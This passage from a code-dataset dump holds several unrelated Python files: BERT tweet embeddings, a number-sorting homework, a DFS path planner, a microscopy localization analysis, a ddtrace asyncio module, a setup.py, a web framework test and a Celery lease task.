test_wins = sim(n = n, weight1 = die1, weight2 = die2)\n trial[test_wins] += 1\n \n data[(die1, die2)] = trial\n \n trial = [0 for i in range(n+1)] \n \n for test in range(N):\n test_wins = sim(n = n, weight1 = die1)\n trial[test_wins] += 1 \n \n data[(die1, 0)] = trial\n \n return data","sub_path":"Trials.py","file_name":"Trials.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"654514184","text":"# BERT document embeddings\nimport pandas as pd\nimport numpy as np\nimport torch\nimport transformers as ppb # pytorch transformers\nfrom sklearn.base import TransformerMixin\n\ndata_file = pd.read_csv(r'COVID19_Dataset-text_labels_only.csv')\ntweets = np.asarray(data_file['Tweet'].copy())\ntargets = np.asarray(data_file['Is_Unreliable'].copy())\n\nfor i in range(np.shape(tweets)[0]):\n tweets[i] = tweets[i].lower()\n\nclass Text2Embed(TransformerMixin):\n \"\"\" Description:\n Transformer that takes in a list of strings, constructs word embeddings\n using BERT, and then provides the text embeddings of a (new) list of texts\n depending on which words in the \"vocab\" occur in the (new) strings.\n \"\"\"\n\n # initialize class & private variables\n def __init__(self):\n\n self.corpus = None\n #self.X = None\n self.text_embeddings = None\n \n # Load pretrained model/tokenizer\n model_class, tokenizer_class, pretrained_weights = (ppb.BertModel, ppb.BertTokenizer, 'bert-base-uncased')\n self.tokenizer = tokenizer_class.from_pretrained(pretrained_weights)\n self.model = model_class.from_pretrained(pretrained_weights)\n\n def fit(self, corpus, y=None):\n\n \"\"\" Do nothing because BERT will be used in transform method. Return self.\n\n Params:\n corpus: list of strings\n\n Returns: self\n \"\"\"\n\n return self\n\n def transform(self, new_corpus=None, y=None):\n\n \"\"\" Get text embeddings for given corpus, using BERT embeddings.\n\n Returns: text embeddings (shape: num texts by embedding dimensions)\n \"\"\"\n \n # Load pretrained model/tokenizer\n tokenizer = self.tokenizer\n model = self.model\n \n for k in range(len(new_corpus)):\n text = new_corpus[k]\n \n tokenized = tokenizer.encode(text.lower(), add_special_tokens=True)\n #tokenized = np.array(tokenized)\n \n # max length of tweet tokens is 83 (from Saswat's code); pad all vectors\n maxi = 83\n #padded = list()\n #padded.append(np.array(tokenized + [0]*(maxi - len(tokenized))))\n padded = np.array(tokenized + [0]*(maxi - len(tokenized)))\n \n segment_ids = [1]*len(padded) # to tell BERT that all tokens are in the same sequence (tweet)\n \n # create tensors\n tokens_tensor = torch.tensor([padded])\n segments_tensor = torch.tensor([segment_ids])\n \n with torch.no_grad():\n last_hidden_states = model(tokens_tensor, segments_tensor)[0] # pull out only the last hidden state\n \n last_hidden_states = last_hidden_states.numpy() # dim: tweets x words x features (where tweets = 1)\n \n text_vec = last_hidden_states[0,0,:] # pull out first document (bc there's only one tweet each time) and first token vector (for [CLS] token); dim: features = 768\n \n if k == 0:\n full_matrix = text_vec\n else:\n full_matrix = np.vstack((full_matrix, text_vec))\n\n self.text_embeddings = full_matrix\n\n return self.text_embeddings.copy()\n\n\n# instantiate embedder\nembedder = Text2Embed()\nembedder.fit(data_file['Tweet'])\n\n# get BERT embeddings\nembedded_tweets = embedder.transform(data_file['Tweet'])\n\n# save array of embedded tweets\nnp.save('bert_embeddings', 
embedded_tweets)\n","sub_path":"first_paper_submission/23Jan2021/classification_redo_BERT/BERT_create_embeddings_redo.py","file_name":"BERT_create_embeddings_redo.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"352246362","text":"#\n# HW1 - Part 1\n# Sorter Program\n# 3 Oct 18\n#\n# Dr. Travis Mayberry \n# SY301\n#\n\nprint('This program will sort three numbers\\n')\n\nwhile True: \n\n    try: \n        print('Please enter the first number: ') \n        int1 = int(input())\n\n    except ValueError: \n        print('Not an int...') \n        continue\n\n    # int() raises ValueError on empty input, so no separate blank-input check is needed\n    break\n\nwhile True: \n\n    try: \n        print('Please enter the second number: ') \n        int2 = int(input())\n\n    except ValueError: \n        print('Not an int...') \n        continue\n\n    break\n\n\nwhile True: \n\n    try: \n        print('Please enter the third number: ') \n        int3 = int(input())\n\n    except ValueError: \n        print('Not an int...') \n        continue\n\n    break\n\n\nmaxint = max(int1, int2, int3)\nminint = min(int1, int2, int3)\nmidint = (int1 + int2 + int3) - (maxint + minint)\n\nprint('Sorted: ' + str(minint) + ',' + str(midint) + ',' + str(maxint)) \n\n\n\n","sub_path":"hw/hw1_sorter.py","file_name":"hw1_sorter.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"482233245","text":"import random\nimport os\n\n\ndef main():\n\n    basedir = os.path.dirname(os.path.realpath(__file__))\n    quote_source = os.path.join(basedir, 'productive_quotes.txt')\n\n    with open(quote_source, 'r') as f:\n        quotes = f.read().split('\\n\\n')\n\n    quote = quotes[random.randint(0, len(quotes) - 1)]\n\n    print()\n    print(quote)\n    print()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"inspire_me.py","file_name":"inspire_me.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"473161926","text":"import datetime \nimport numpy as np\n\nclass DepthFirstPlanner(object):\n    \n    def __init__(self, planning_env, visualize):\n        self.planning_env = planning_env\n        self.visualize = visualize\n        self.nodes = dict()\n\n    def plotEdge(self, src_id, dst_id):\n        src_coord = self.planning_env.discrete_env.NodeIdToConfiguration(src_id)\n        dst_coord = self.planning_env.discrete_env.NodeIdToConfiguration(dst_id)\n        self.planning_env.PlotEdge(src_coord, dst_coord)\n\n    def Plan(self, start_config, goal_config):\n        \n        # Here you will implement the depth first planner\n        # The return path should be a numpy array\n        # of dimension k x n where k is the number of waypoints\n        # and n is the dimension of the robots configuration space\n\n        if self.visualize and hasattr(self.planning_env, 'InitializePlot'):\n            self.planning_env.InitializePlot(goal_config)\n\n        print('DFS planning ...')\n        print('Start State ...', start_config)\n        print('Goal State ...', goal_config)\n\n        start_id = self.planning_env.discrete_env.ConfigurationToNodeId(start_config)\n        goal_id = self.planning_env.discrete_env.ConfigurationToNodeId(goal_config)\n\n        print('Start State ID ...', start_id)\n        print('Goal State ID ...', goal_id)\n\n        stk = []\n        stk.append((start_id, None))\n\n        closest_dist2goal = self.planning_env.ComputeDistance(start_id, 
goal_id)\n closest_node = start_id\n\n start = datetime.datetime.now() \n visited = {} \n while (len(stk) > 0):\n (node_id, parent_id) = stk.pop()\n if node_id in visited:\n continue\n\n dist2goal = self.planning_env.ComputeDistance(node_id, goal_id)\n if dist2goal < closest_dist2goal:\n closest_dist2goal = dist2goal\n closest_node = node_id\n\n visited[node_id] = parent_id\n \n if (node_id != start_id):\n self.plotEdge(node_id, parent_id)\n \n if (len(visited) % 5 ==0):\n print('Closest dist to goal : ', closest_dist2goal)\n \n if (node_id == goal_id):\n print('Goal found')\n break\n\n successors = self.planning_env.GetSuccessors(node_id)\n if len(successors) != 0: \n for succ_id in successors:\n if succ_id not in visited:\n stk.append((succ_id, node_id))\n else:\n print('No successors for ', node_id)\n \n path = [goal_id]\n while path[-1] != start_id:\n path.append(visited[path[-1]])\n \n plan = [self.planning_env.discrete_env.NodeIdToConfiguration(node) for node in path[::-1]]\n elapsed = (datetime.datetime.now() - start).seconds\n print('Plan length :', len(plan))\n print('Nodes visited:', len(visited))\n print('Elapsed time:', elapsed)\n return np.array(plan)\n","sub_path":"robot_autonomy/hw3/code/DepthFirstPlanner.py","file_name":"DepthFirstPlanner.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"17117350","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 4 13:21:54 2019\n\n@author: GEORGEDICKINSON\n\"\"\"\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport h5py\nimport os\nimport shutil\nfrom sklearn import cluster, datasets, mixture\nfrom sklearn.neighbors import kneighbors_graph\nfrom itertools import cycle, islice\nfrom sklearn.preprocessing import StandardScaler, scale\nfrom scipy.ndimage import gaussian_filter, distance_transform_edt, label\nfrom skimage.filters import threshold_local\nfrom skimage.color import rgb2gray\nfrom skimage import measure\nfrom skimage.feature import peak_local_max\nfrom skimage.morphology import watershed\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport pandasql as ps\n\n#picasso hdf5 format (with averaging): ['frame', 'x', 'y', 'photons', 'sx', 'sy', 'bg', 'lpx', 'lpy', 'group']\n#Column Name |\tDescription |\tC Data Type\n#frame\t |The frame in which the localization occurred, starting with zero for the first frame.\t |unsigned long\n#x |The subpixel x coordinate in camera pixels\t |float\n#y\t |The subpixel y coordinate in camera pixels\t |float\n#photons\t |The total number of detected photons from this event, not including background or camera offset\t |float\n#sx\t |The Point Spread Function width in camera pixels |\tfloat\n#sy\t |The Point Spread Function height in camera pixels |\tfloat\n#bg\t |The number of background photons per pixel, not including the camera offset |\tfloat\n#lpx\t |The localization precision in x direction, in camera pixels, as estimated by the Cramer-Rao Lower Bound of the Maximum Likelihood fit. |\tfloat\n#lpy\t |The localization precision in y direction, in camera pixels, as estimated by the Cramer-Rao Lower Bound of the Maximum Likelihood fit. 
|\tfloat\n\n\n#set filepath\n\n#filtered by photons averaged dataset\nfilePath = r\"D:\\data\\2019-07-22\\20190722_FlowCell_Chris_Triangles_ANDJRectangle_TEST_2ROW_300msExp_Mid-9nt-3nM_MgCl2_18mM_PCA_12mM_PCD_TROLOX_1mM_13_30_59-locs_locs_render_DRIFT_3_picked2_filtered_avg.hdf5\"\nbackgroundCenteroids = np.array([[256.195,255.898],[255.898,256.204], [255.743,255.843]])\n\n\nsavePath = filePath.split('.')[0] + '_analysisResult.csv'\n\n#open picasso hdf5 file as DF\nlocs = pd.read_hdf(filePath, '/locs')\n#check header\nheaders = locs.dtypes.index\nprint(headers)\nprint(locs.shape)\nprint(locs.head(n=5))\n\n#scatter plot\n#locs.plot.scatter(x='x',y='y', s=1, c='photons')\nlocs.plot.scatter(x='x',y='y', s=0.1, c='lpx', colormap='hot')\nx = locs['x']\ny = locs['y']\nphotons=locs['photons']\nlpx = locs['lpx']\nlpy = locs['lpy']\n\n\n#group by 'group' - get mean values\ngroupedLocs = locs.groupby('group',as_index=False).mean().drop(['frame', 'x', 'y', 'sx', 'sy', 'bg', 'lpx', 'lpy'],axis=1)\n#groupedLocs.rename(index=str,columns={'x':'meanX', 'y':'meanY', 'photons':'meanPHOTONS', 'sx':'meanSX', 'sy':'meanSY', 'bg':'meanBG', 'lpx':'meanLPX', 'lpy':'meanLPY'},inplace=True)\ngroupedLocs.rename(index=str,columns={'photons':'meanPHOTONS'},inplace=True)\n\n#merge locs and groupedLocs based on group\nlocs = locs.merge(groupedLocs, on='group', how='outer')\n\n#add normalized photon count (photons normalized by group mean photons)\nlocs['photons_normalized'] = np.divide(locs['photons'],locs['meanPHOTONS'])\n\n#plt.figure(1)\n#plt.scatter(x,y, s=1,c=photons)\n#plt.scatter(x,y, s=1,c=lpx)\n\n# gaussian blur\nnBins = 750\nH, xedges, yedges = np.histogram2d(x,y,bins=nBins )\nH_guass = gaussian_filter(H, sigma=5)\n\nH_guassMask = H_guass < 5\nH_guass[H_guassMask] = [0] \n\n\nfig2, ax0 = plt.subplots()\nax0.imshow(np.rot90(H_guass))\nX, Y = np.meshgrid(xedges, yedges)\nax0.pcolormesh(X, Y, H_guass)\n\n\n#threshold\n#gray = rgb2gray(H_guass)\nthresholded = threshold_local(H_guass, 3) \nbinary_adaptive = H_guass > thresholded\n\n#fig3, ax = plt.subplots()\n#ax.pcolormesh(X, Y, binary_adaptive)\n\n#blob detection ##REPLACED BY WATERSHED DETECTION##\n#labels = measure.label(binary_adaptive)\n\n#watershed\nD = distance_transform_edt(binary_adaptive)\nlocalMax = peak_local_max(D, indices=False,min_distance=5)\n# perform a connected component analysis on the local peaks,\n# using 8-connectivity, then apply the Watershed algorithm\nmarkers = label(localMax, structure=np.ones((3, 3)))[0]\nlabels = watershed(-D, markers, mask=binary_adaptive)\nprint(\"[INFO] {} unique segments found\".format(len(np.unique(labels)) - 1))\n\n\nfig3, ax = plt.subplots()\nax.pcolormesh(X, Y, D)\n#ax.pcolormesh(X, Y, labels)\n#ax.pcolormesh(X, Y, mask)\n\n\n\n\n#for scaling\nminXValue = min(xedges)\nmaxXValue = max(xedges)\nminYValue = min(yedges)\nmaxYValue = max(yedges)\n\nxRange = maxXValue - minXValue\nyRange = maxYValue - minYValue\n\ncenteroids = []\nboxProps = []\n\n\nfor region in measure.regionprops(labels):\n    # take regions with large enough areas\n    if region.area >= 200 and region.area < 1200 and region.solidity > 0.8:\n\t\n        # draw rectangle around segmented objects\n        minr, minc, maxr, maxc = region.bbox\n        \n        #scale to match original data range\n        minr = (np.divide(minr,nBins) * yRange) + minYValue\n        minc = (np.divide(minc,nBins) * xRange) + minXValue\n        maxr = (np.divide(maxr,nBins) * yRange) + minYValue\n        maxc = (np.divide(maxc,nBins) * xRange) + minXValue\n        \n        boxProps.append([minr,minc,maxr,maxc])\n        \n        #get centeroid\n        
(cent_x,cent_y) = region.centroid \n cent_y = (np.divide(cent_y,nBins) * yRange) + minYValue\n cent_x = (np.divide(cent_x,nBins) * xRange) + minXValue\n \n centeroids.append([cent_x,cent_y]) \n\n rect = mpatches.Rectangle((minc, minr), maxc - minc, maxr - minr,\n\t\t\t\t\t\t\t\t\t\t\t\tfill=False, edgecolor='red', linewidth=2)\n \n ax.add_patch(rect)\n\n#manually add centeroids here, if needed\n#centeroids = centeroids + [[],[],[]]\n\ncenteroids = np.array(centeroids)\n\n#plt.figure(4)\nfig4, ax2 = plt.subplots()\nax2.scatter(x,y, s=0.1, color='black')\n\n\n\n#filter locs by centeroid positions\nsearchArea = 0.035 * 0.035\nfilteredLocs= pd.DataFrame()\n\nfor i in range(len(centeroids)):\n query = \"SELECT * FROM locs WHERE (((locs.x - {})*(locs.x - {})) + ((locs.y - {})*(locs.y - {}))) <= ({})\".format(centeroids[i][0], centeroids[i][0], centeroids[i][1], centeroids[i][1], searchArea)\n filtered = ps.sqldf(query,locals())\n filtered['bindingSite'] = i\n filteredLocs = filteredLocs.append(filtered)\n print(i)\n\n\n#export filteredDF\nfilteredLocs.to_csv(savePath)\n\n\n\n##########################################################################################################\n\n#filteredLocs.plot.scatter(x='x',y='y', s=0.1, color='black')\n\nax2.scatter(x=filteredLocs.x, y=filteredLocs.y, s=0.1, color='blue')\nax2.scatter(centeroids[:,0],centeroids[:,1], color='red')\n\n\n#get background from manually selected locations\n\nbackGroundLocs = pd.DataFrame()\n\nfor i in range(len(backgroundCenteroids)):\n query = \"SELECT * FROM locs WHERE (((locs.x - {})*(locs.x - {})) + ((locs.y - {})*(locs.y - {}))) <= ({})\".format(backgroundCenteroids[i][0], backgroundCenteroids[i][0], backgroundCenteroids[i][1], backgroundCenteroids[i][1], searchArea)\n filtered = ps.sqldf(query,locals())\n filtered['bindingSite'] = i\n backGroundLocs = backGroundLocs.append(filtered)\n print(i)\n\n#backGroundLocs.plot.scatter(x='x',y='y', s=0.1, color='black')\n\nax2.scatter(x=backGroundLocs.x, y=backGroundLocs.y, s=0.1, color='green')\nax2.scatter(backgroundCenteroids[:,0],backgroundCenteroids[:,1], color='yellow') \n\n#plot all binding sites against time\nfilteredLocs.plot.scatter(x='frame',y='photons_normalized',c='bindingSite',colormap='tab20b',s=0.5)\nfilteredLocs.plot.scatter(x='frame',y='photons',c='bindingSite',colormap='tab20b',s=0.5)\n\nfilteredLocs.hist('photons_normalized',bins=1000)\nfilteredLocs.hist('photons',bins=1000)\n\nbackGroundLocs.hist('photons_normalized',bins=1000)\nbackGroundLocs.hist('photons',bins=1000)\n\n#plot by binding site\ndef createPlot(df, groupNumber = [0], bindingSite = 0, filterByGroup = True, normalized = True):\n #if filter by group true:\n if filterByGroup:\n group = df.loc[(df.group.isin(groupNumber)) & (df.bindingSite == bindingSite)]\n else:\n group = df.loc[df.bindingSite == bindingSite]\n \n #plot group histogram photons\n if normalized:\n group.hist(column='photons_normalized',bins=40)\n else:\n group.hist(column='photons',bins=40)\n\n #plot histo frames\n group.hist(column='frame', bins=40)\n \n #plot group photons / frame\n if normalized:\n group.plot.scatter(x='frame', y='photons_normalized')\n else:\n group.plot.scatter(x='frame', y='photons') \n \n return\n\n\n#createPlot(filteredLocs, groupNumber = [0], bindingSite = 0, normalized=True)\n#createPlot(filteredLocs, bindingSite = 12, filterByGroup = False)\ncreatePlot(filteredLocs, bindingSite = 0, filterByGroup = False, normalized = False)\n\n#plot all binding sites seperately\n#for i in 
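The localization-analysis record above chains 2-D histogram, Gaussian blur, local threshold, distance transform, peak markers, and watershed before measuring regions. A minimal sketch of the same pipeline on synthetic blobs, using the record's own imports (indices=False matches the older scikit-image API used above; newer releases return coordinates instead and expose watershed in skimage.segmentation):

import numpy as np
from scipy.ndimage import gaussian_filter, distance_transform_edt, label
from skimage.feature import peak_local_max
from skimage.morphology import watershed  # skimage.segmentation.watershed in newer releases

img = np.zeros((100, 100))
img[20:35, 20:35] = 1.0   # two synthetic blobs standing in for the histogram
img[60:80, 55:75] = 1.0
blurred = gaussian_filter(img, sigma=2)
binary = blurred > 0.3
D = distance_transform_edt(binary)
localMax = peak_local_max(D, indices=False, min_distance=5)  # boolean marker mask
markers = label(localMax, structure=np.ones((3, 3)))[0]      # 8-connected components
segments = watershed(-D, markers, mask=binary)
print(len(np.unique(segments)) - 1)  # typically 2 segments, one per blob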
range(max(filteredLocs['bindingSite'])):\n# createPlot(filteredLocs, bindingSite = i, filterByGroup = False, normalized = False)\n# print(i)\n\n\n#get number of binding sites per object\n\ndef bindingSitePlot(df, groupNumber = 0, numberOfBindingSites = len(centeroids)):\n group = df.loc[df.group == groupNumber]\n bindingSites = group.groupby('bindingSite',as_index=False).count().drop(['x', 'y', 'photons', 'sx', 'sy', 'bg', 'lpx', 'lpy', \n 'meanPHOTONS', 'photons_normalized'],axis=1)\n #bindingSites['group'] = groupNumber\n #bindingSites.rename(index=str,columns={'frame':'numberOfLocalizations'},inplace=True)\n #print(bindingSites)\n #group.hist(column='bindingSite',bins=numberOfBindingSites)\n count,division = np.histogram(group['bindingSite'], bins=numberOfBindingSites)\n return count\n\n#binding sites\nnumberOfBindingSites = len(filteredLocs['bindingSite'].unique()) \nbindingSiteDF = pd.DataFrame(columns=list(range(numberOfBindingSites))).astype(int) \nfor i in range(len(filteredLocs['group'].unique())):\n bindingSiteDF.loc[i] = bindingSitePlot(filteredLocs, groupNumber = i)\n \n#background\nnumberOfBackgroundSites = len(backGroundLocs['bindingSite'].unique()) \nbackgroundDF = pd.DataFrame(columns=list(range(numberOfBackgroundSites))).astype(int) \nfor i in range(len(backGroundLocs['group'].unique())):\n backgroundDF.loc[i] = bindingSitePlot(backGroundLocs, groupNumber = i, numberOfBindingSites = numberOfBackgroundSites)\n\n\nbackgroundStats = backgroundDF.describe()\nbackgroundMean = np.mean(backgroundStats.loc['mean'].values)\n\n\nbindingSiteStatDF = pd.DataFrame()\n\nbindingSiteStatDF['zeros'] = (bindingSiteDF < backgroundMean).astype(int).sum(axis=1)\nbindingSiteStatDF['numberOfBindingSites'] = (numberOfBindingSites - bindingSiteStatDF['zeros'])\n\n#fig5, ax3 = plt.subplots()\nfig5 = bindingSiteStatDF.hist(column='numberOfBindingSites', bins=numberOfBindingSites+1)\nfig5.flatten()[0].set_xlabel('number of binding sites per origami')\nfig5.flatten()[0].set_ylabel('number of origami')\n\nstats = bindingSiteDF.describe()\nind = np.arange(numberOfBindingSites)\nsiteMean = stats.loc['mean'].values\nsiteStd = stats.loc['std'].values\n\nfig6, ax4 = plt.subplots()\nax4.bar(ind,siteMean, width=0.5, yerr = siteStd)\nax4.set_xlabel('binding site')\nax4.set_ylabel('mean localizations per origami')\n\n\nsiteMap = bindingSiteDF > backgroundMean\nsiteMap_stats = siteMap.describe()\nsiteFrequency = siteMap_stats.loc['freq'].values\n\nnumberOfGroups = len(filteredLocs['group'].unique())\n\nsitePercent = siteFrequency / numberOfGroups\n\nfig7, ax5 = plt.subplots()\nax5.bar(ind,sitePercent, width=0.5)\nax5.set_ylabel('site frequency (%)')\nax5.set_xlabel('binding site')\n\ncenteroidGroups=range(len(centeroids))\n\nfig8, ax6 = plt.subplots()\nscatter = ax6.scatter(centeroids[:,0],centeroids[:,1], s=800, c=sitePercent, cmap='hot',edgecolors='black',linewidths=1)\nlegend = ax6.legend(*scatter.legend_elements(),\n loc=\"lower left\", title=\"site frequency\")\n#ax6.axis([0,512,0,512])\nax6.add_artist(legend) \nfor i,txt in enumerate(centeroidGroups):\n ax6.annotate(txt, (centeroids[i][0]+0.02,centeroids[i][1]))\n\n\n\n\n\n\n","sub_path":"BSU/TestALL_analysis_2.py","file_name":"TestALL_analysis_2.py","file_ext":"py","file_size_in_byte":12736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"491462795","text":"\"\"\"\nThis integration provides the ``AsyncioContextProvider`` that follows the execution\nflow of a ``Task``, making possible to trace 
asynchronous code built on top\nof ``asyncio``. To trace asynchronous execution, you must::\n\n import asyncio\n from ddtrace import tracer\n from ddtrace.contrib.asyncio import context_provider\n\n # enable asyncio support\n tracer.configure(context_provider=context_provider)\n\n async def some_work():\n with tracer.trace('asyncio.some_work'):\n # do something\n\n # launch your coroutines as usual\n loop = asyncio.get_event_loop()\n loop.run_until_complete(some_work())\n loop.close()\n\nIf ``contextvars`` is available, we use the\n:class:`ddtrace.provider.DefaultContextProvider`, otherwise we use the legacy\n:class:`ddtrace.contrib.asyncio.provider.AsyncioContextProvider`.\n\nIn addition, helpers are provided to simplify how the tracing ``Context`` is\nhandled between scheduled coroutines and ``Future`` invoked in separated\nthreads:\n\n * ``set_call_context(task, ctx)``: attach the context to the given ``Task``\n so that it will be available from the ``tracer.get_call_context()``\n * ``ensure_future(coro_or_future, *, loop=None)``: wrapper for the\n ``asyncio.ensure_future`` that attaches the current context to a new\n ``Task`` instance\n * ``run_in_executor(loop, executor, func, *args)``: wrapper for the\n ``loop.run_in_executor`` that attaches the current context to the\n new thread so that the trace can be resumed regardless when\n it's executed\n * ``create_task(coro)``: creates a new asyncio ``Task`` that inherits\n the current active ``Context`` so that generated traces in the new task\n are attached to the main trace\n\nA ``patch(asyncio=True)`` is available if you want to automatically use above\nwrappers without changing your code. In that case, the patch method **must be\ncalled before** importing stdlib functions.\n\"\"\"\nfrom ...utils.importlib import require_modules\n\n\nrequired_modules = ['asyncio']\n\nwith require_modules(required_modules) as missing_modules:\n if not missing_modules:\n from .provider import AsyncioContextProvider\n from ...internal.context_manager import CONTEXTVARS_IS_AVAILABLE\n from ...provider import DefaultContextProvider\n\n if CONTEXTVARS_IS_AVAILABLE:\n context_provider = DefaultContextProvider()\n else:\n context_provider = AsyncioContextProvider()\n\n from .helpers import set_call_context, ensure_future, run_in_executor\n from .patch import patch\n\n __all__ = [\n 'context_provider',\n 'set_call_context',\n 'ensure_future',\n 'run_in_executor',\n 'patch'\n ]\n","sub_path":"ddtrace/contrib/asyncio/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"194418588","text":"import os\nfrom playhouse.sqlite_ext import SqliteExtDatabase\n\n# Replace this with a random value\nSECRET_KEY = 'shhh, secret!'\n\nTIMEZONE = \"Europe/Rome\"\nLOCALE = \"it_IT\"\n\n\n# APP path\nAPP_DIR = os.path.dirname(os.path.realpath(__file__))\n\n# Database connection\nDATABASE_FILE = os.path.join(APP_DIR, \"events.db\")\nDATABASE = SqliteExtDatabase(DATABASE_FILE)\n\n# Enable debug and cache update requests\nDEBUG = True\n\n# Base url for web app\nBASEURL = \"\"\n\n# Base url for static assets\nSTATIC_DIR = APP_DIR + \"/static\"\nSTATICURL = BASEURL + \"/static\"\n","sub_path":"sources/example.settings.py","file_name":"example.settings.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"108746493","text":"# Copyright (C) 2019 FireEye, Inc. 
All Rights Reserved.\n\nfrom setuptools import setup\nimport os\nimport re\n\n__all__ = ['metadata', 'setup']\n\n# Get the base directory\nhere = os.path.dirname(__file__)\nif not here:\n here = os.path.curdir\n\n# Text describing the module\nlong_description = 'stringsifter is a machine learning-based tool ' + \\\n 'that automatically ranks the output of the ' + \\\n '`strings` program for binary triage analysis.'\n\n# Get the version\nversfile = os.path.join(here, 'stringsifter', 'version.py')\n_version = {}\nwith open(versfile, 'r') as fid:\n exec(fid.read(), _version)\n\n# Do some Pipfile parsing to avoid two copies of the requirements,\n# but this is fragile\nreqsfile = os.path.join(here, 'Pipfile')\nrequirements = []\nwith open(reqsfile, 'r') as fid:\n in_packages_section = False\n for line in fid.readlines():\n if line.startswith('['):\n in_packages_section = line.rstrip() == '[packages]'\n continue\n if in_packages_section:\n m = re.match(r'([\\w-]+) *= *\"(.*)\"', line)\n if m:\n if m.group(2) == '*':\n requirements.append(m.group(1))\n else:\n requirements.append(m.group(1) + m.group(2))\n\n# Get the list of scripts\nscripts = []\n\n_packages = ['stringsifter', 'stringsifter/lib']\n\n_package_data = {'stringsifter': ['model/*.pkl',\n 'lib/*.pkl',\n 'lib/*.ftz',\n 'lib/*.json']}\n\n# Set the parameters for the setup script\nmetadata = {\n # Setup instructions\n 'provides': ['stringsifter'],\n 'packages': _packages,\n 'package_data': _package_data,\n 'scripts': scripts,\n 'entry_points': {\n 'console_scripts': ['rank_strings=stringsifter.rank_strings:argmain',\n 'flarestrings=stringsifter.flarestrings:main']\n },\n 'install_requires': requirements,\n 'python_requires': '<3.11',\n # Metadata\n 'name': 'stringsifter',\n 'version': _version['__version__'],\n 'description': 'stringsifter is a machine learning-based tool that ' + \\\n 'automatically ranks the output of the `strings` ' + \\\n 'program for binary triage analysis.',\n 'long_description': long_description,\n 'url': 'https://github.com/mandiant/stringsifter',\n 'download_url': 'https://github.com/mandiant/stringsifter',\n 'keywords': ['stringsifter', 'rank', 'strings', 'binary', 'triage'],\n }\n\n# Execute the setup script\nif __name__ == '__main__':\n setup(**metadata)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"359689935","text":"# -*- coding: UTF-8 -*-\nfrom plone.app.testing.bbb import PloneTestCase\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFDynamicViewFTI.interfaces import IDynamicViewTypeInformation\n\n\nclass TestBaseProfile(PloneTestCase):\n\n def afterSetUp(self):\n self.loginAsPortalOwner()\n qi = self.portal.portal_quickinstaller\n qi.uninstallProducts(['ATContentTypes'])\n portal_setup = self.portal.portal_setup\n portal_setup.runAllImportStepsFromProfile('profile-Products.ATContentTypes:base')\n\n def test_attypes_not_installed(self):\n tt = getToolByName(self.portal, 'portal_types')\n types = tt.listTypeInfo()\n for t in types:\n self.assertNotEqual(t.product, 'ATContentTypes')\n","sub_path":"buildout-cache--/eggs/Products.ATContentTypes-2.2.5-py2.7.egg/Products/ATContentTypes/tests/test_base_profile.py","file_name":"test_base_profile.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"251473820","text":"import pytest\n\nfrom bocadillo import 
API\n\n\n@pytest.mark.parametrize(\"data, status\", [(\"{\", 400), (\"{}\", 200)])\ndef test_parse_json(api: API, data: str, status: int):\n @api.route(\"/\")\n class Index:\n async def post(self, req, res):\n res.media = await req.json()\n\n assert api.client.post(\"/\", data=data).status_code == status\n\n\n@pytest.mark.parametrize(\n \"get_stream\", [lambda req: req, lambda req: req.stream()]\n)\ndef test_stream_request(api: API, get_stream):\n @api.route(\"/\")\n class Index:\n async def get(self, req, res):\n chunks = [\n chunk.decode() async for chunk in get_stream(req) if chunk\n ]\n res.media = chunks\n\n # For testing, we use a chunk-encoded request. See:\n # http://docs.python-requests.org/en/master/user/advanced/#chunk-encoded-requests\n\n message = \"Hello, world!\"\n\n def stream():\n for _ in range(3):\n yield message\n\n response = api.client.get(\"/\", data=stream())\n assert response.json() == [message] * 3\n","sub_path":"tests/test_http_request.py","file_name":"test_http_request.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"304671689","text":"from __future__ import absolute_import, unicode_literals\nfrom celery import shared_task\nfrom leases.models import LeaseAgreement\nfrom leases.utils import LeaseAgreementStatus\nfrom payments.services import SubscriptionProcessor\nimport datetime\n\n@shared_task\ndef deactivate_lease_agreements():\n\tresult_set = LeaseAgreement.objects.filter(status=LeaseAgreementStatus.ACTIVE)\n\tfor result in result_set:\n\t\tnow = datetime.date.today()\n\t\tprint('Now: %r' % now)\n\t\tprint('Result end date: %r' % result.lease_end_date)\n\t\tif result.lease_end_date == now:\n\t\t\tdeactive_lease_agreement.delay(result.id)\n\n@shared_task\ndef deactive_lease_agreement(lease_agreement_id):\n\tlease_agreement = LeaseAgreement.objects.filter(pk=lease_agreement_id).first()\n\tif lease_agreement is None:\n\t\treturn\n\ttenants = lease_agreement.get_tenants()\n\tfor tenant in tenants:\n\t\tuser = tenant.user\n\t\tSubscriptionProcessor.unsubscribe(lease_agreement, user)\n\tlease_agreement.status = 